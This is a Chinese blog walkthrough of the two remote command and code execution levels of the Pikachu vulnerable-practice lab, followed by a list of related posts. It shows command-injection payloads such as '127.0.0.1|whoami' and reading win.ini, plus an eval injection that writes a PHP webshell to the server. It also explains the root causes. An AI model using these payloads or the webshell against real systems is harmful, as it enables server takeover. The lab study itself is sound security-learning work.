pikachu RCE(remote command/code execute)(远程命令执行/远程代码执行)(皮卡丘漏洞平台通关系列)
目录
一、官方介绍
二、诚意推荐
三、悠闲通关
第1关 exec "ping"
第2关 exec "eval"
一、官方介绍
本节引用内容来源pikachu漏洞平台
RCE(remote command/code execute)概述
RCE漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。
远程系统命令执行
一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口
比如我们常见的路由器、防火墙、入侵检测等设备的web管理界面上
一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。 而,如果,设计者在完成该功能时,没有做严格的安全控制,则可能会导致攻击者通过该接口提交“意想不到”的命令,从而让后台进行执行,从而控制整个后台服务器现在很多的甲方企业都开始实施自动化运维,大量的系统操作会通过"自动化运维平台"进行操作。 在这种平台上往往会出现远程系统命令执行的漏洞,不信的话现在就可以找你们运维部的系统测试一下,会有意想不到的"收获"-_-
远程代码执行
同样的道理,因为需求设计,后台有时候也会把用户的输入作为代码的一部分进行执行,也就造成了远程代码执行漏洞。 不管是使用了代码执行的函数,还是使用了不安全的反序列化等等。因此,如果需要给前端用户提供操作类的API接口,一定需要对接口输入的内容进行严格的判断,比如实施严格的白名单策略会是一个比较好的方法。
你可以通过“RCE”对应的测试栏目,来进一步的了解该漏洞。
二、诚意推荐
https://chybeta.github.io/2017/08/08/php代码-命令执行漏洞/ 这是别人的一篇文章,对代码执行和命令执行漏洞相关的函数总结的挺好的
远程命令执行/命令注入 之 命令连接符 (https://blog.csdn.net/elephantxiang/article/details/115361185) 这一篇是我之前总结的windows和linux系统下的命令连接符的种类、特征以及实际操作。
DVWA通关--命令注入(command injection)(https://blog.csdn.net/elephantxiang/article/details/110940221) 这篇是我之前写的DVWA靶场的命令注入通关
三、悠闲通关
这两关都比较简单直白,理论性的内容就不多描述了,看上一节诚意推荐的链接就行。
第1关 exec "ping"
看关卡名字就知道是远程命令执行了
果不其然进来就是个ping ip地址的地方
由于windows和linux有3个命令连接符是相同的(|,||,&&),因此在不知道目标的具体操作系统的情况下(虽然是我自己搭建的环境,但是,假装不知道吧,嘻嘻),我比较喜欢先用这三种。
这次先用管道符(|)试试吧。
命令就用whoami,原因在远程命令执行/命令注入 之 命令连接符也有说。
输入payload:127.0.0.1|whoami
成功得到域和用户名:e0c8k97s36f0uri\administrator
同时也知道了操作系统是windows
输入payload:127.0.0.1|dir
可以查看当前路径和路径下的文件
输入payload:127.0.0.1|type C:\Windows\win.ini
可以查看win.ini文件的内容
P.S.这关后来试了windows下的4中命令连接符都是可以成功的,注意||和&&的短路现象。
造成这个漏洞的原因可以看一下本关的源代码,如下图,关注一下用户输入的参数值$_POST['ipaddress']的流向。
本关代码中,首先将$_POST['ipaddress']赋值给$ip,然后直接未经任何处理就将其传入shell_exec()函数执行,造成命令可拼接执行。
第2关 exec "eval"
题目都提示的这么明显了,直接上payload吧。
输入:phpinfo();
phpinfo()函数被执行了
我膨胀了,我想要个马。
输入payload:fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');
虽然返回了这么个玩意儿,但是魔法已经悄然发生
到靶机上看一看,哦吼,本关目录下多了个马
拿蚁剑这么一连
成了
漏洞原因就是用户输入没过滤就直接传到eval()函数里面去了
愉快结束,洗洗睡了~
pikachu RCE(remote command/code execute)(远程命令执行/远程代码执行)(皮卡丘漏洞平台通关系列)相关推荐
- pikachu File Inclusion 文件包含漏洞 (皮卡丘漏洞平台通关系列)
目录 一.来自官方的简介 二.来自小可爱的通关步骤 第一关 File Inclusion(local) 1.读取"隐藏"文件 2.读取系统文件 3.结合文件上传getshell ...
- pikachu SQL注入 (皮卡丘漏洞平台通关系列)
目录 一.官方的戏精引言 二.仙女在认真闯关 一重天 数字型注入 二重天 字符型注入 三重天 搜索型注入 四重天 xx型注入 五重天 insert/update注入 (1)insert注入 (2)up ...
- pikachu XXE (XML外部实体注入)(皮卡丘漏洞平台通关系列)
目录 一.来自官方的介绍以及来自民间的扩展 1.pikachu官方简介 2.小女子之前画的脑图 3.两个不错的博客 二.小白菜的闯关 1.查看系统文件内容 2.查看php源代码 3.爆破开放端口 三. ...
- pikachu SQL 注入(皮卡丘漏洞平台通关系列)
一.数字型注入 目录 一.数字型注入 二.字符型注入 在burp抓包 使用reprter注入 找列数id=2 order by 2# &submit=%E6%9F%A5%E8%AF%A2,如果 ...
- pikachu XSS Cross-Site Scripting(皮卡丘漏洞平台通关系列)
目录 一.听pikachu介绍xss 二.羞耻又走心的推荐 三.比较EASY的闯关 第1关 反射型xss(get) 1.阳关道 2.独木桥 3.第三种方法 第2关 反射型xss(post) 第3关 存 ...
- pikachu Over permission 越权(皮卡丘漏洞平台通关系列)
目录 1.水平越权 (1)闯关 (2)原因 (3)防御 2.垂直越权 (1)闯关 (2)原因 (3)防御 3.尾声 这关也挺简单 1.水平越权 也称为横向越权,指相同权限下不同的用户可以互相访问,比如 ...
- pikachu 暴力破解 Brute Force(皮卡丘漏洞平台通关系列)
目录 一.官方概述 二.小白菜的通关 第一关 基于表单的暴力破解 第二关 验证码绕过(on server) 1.绕过步骤 2.一点思考 第三关 验证码绕过(on client) 1.绕过步骤 2 ...
- pikachu Unsafe Filedownload 不安全的文件下载 (皮卡丘漏洞平台通关系列)
这关也几乎是一步就能搞定 1.轻松过关 进入本关看到下图的页面,点击球员名字可以下载头像图片 点击之后直接下载了,没有页面跳转,地址栏的url没有变化 右键 查看网页源代码 通过球员名称快速定位到相关 ...
- pikachu Unsafe Fileupload 不安全的文件上传(皮卡丘漏洞平台通关系列)
目录 一.client check 客户端验证 1.现象 2.绕过姿势 方法一.浏览器禁用javascript 方法二.burpsuite抓包改后缀 3.问题分析 二.MIME type 1.现象 2 ...
最新文章
- 转:iPhone之后,思考下一个科技突破
- 【CVPR 2018】腾讯AI lab提出深度人脸识别中的大间隔余弦损失
- 华大 MCU 之五 SPI 从机 DMA 模式 配置(不能正常接收问题处理)
- 面向对象编程 object oriented programming(OOP)
- 美摄云非编系统——网页端实时编辑渲染方案
- Docker安装Redis以及配置Redis环境
- java使用计算器完成加法、减法运算
- 求助下 Ubuntu 15.10(64 位)下安装 pyspider 下的问题 - V2EX
- android 跨进程 android:process,Android跨进程通信技术-多进程模式的运行机制
- 添加组件_苹果ios14怎么添加删除小组件 小组件叠放添加设置教程
- C++语音信号时域分析
- Office 2010安装1402错误
- 区块链NFT技术演变及技术开发指南
- minio java的lifecycle
- 主平台对接多个系统,系统表的性能和对接方案
- Codeforces 1428E Carrots for Rabbits 贪心
- 【ES6】ES6和ES5特性对比
- XPS测试数据考盘后的处理数据步骤
- Quartz定时任务 - Springboot之Quartz
- 排他思想 (Js代码实现,有经典案例)
热门文章
- python优雅代码大全_10个Python技巧帮你写出更优雅的代码
- 美团内部讲座|北航全权:一种城市空中移动性管理分布式控制框架
- <2>重定向的用法说明和举例
- 人民币升值与升值预期收益股票
- SQLServer表关联查询
- zookeeper zkCli.sh的基本使用方法
- Vulnstack(四)
- Oracle数据库CPU占用过高
- mysql0xc00007b_安装MySQL被提示缺少msvcr120.dll,msvcp120.dll或提示0xc00007b错误
- java unlock_java – 古怪的StampedLock.unlock(长)行为?